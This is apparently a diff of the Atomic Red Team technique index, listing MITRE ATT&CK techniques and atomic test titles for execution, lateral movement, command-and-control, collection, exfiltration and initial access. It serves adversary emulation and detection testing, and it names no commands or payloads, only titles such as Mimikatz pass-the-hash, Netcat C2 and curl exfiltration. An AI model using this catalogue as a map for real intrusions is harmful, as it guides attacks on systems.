- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.001 Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
@@ -1667,16 +1065,9 @@
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.001 PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
@@ -1692,55 +1083,29 @@
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
- Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- [T1059.006 Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- Atomic Test #3: psexec.py (Impacket) [linux]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
- Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -1748,80 +1113,70 @@
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
- Atomic Test #9: WMI Execute rundll32 [windows]
- Atomic Test #10: Application uninstall using WMIC [windows]
# lateral-movement
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- [T1563.002 RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1021.001 Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: RDP to Server [windows]
- Atomic Test #3: Changing RDP Port to Non Standard Port via Powershell [windows]
- Atomic Test #4: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.002 SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.004 DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
@@ -1836,61 +1191,105 @@
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- Atomic Test #3: portproxy reg key [windows]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #1: Psiphon [windows]
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
- Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
- Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: XOR Encoded data. [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# collection
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #3: Execute commands from clipboard [macos]
- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- Atomic Test #5: Windows Screencapture [windows]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# exfiltration
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
@@ -1900,58 +1299,44 @@
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #3: DNSExfiltration (doh) [windows]
- [T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
- Atomic Test #1: C2 Data Exfiltration [windows]
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
- Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
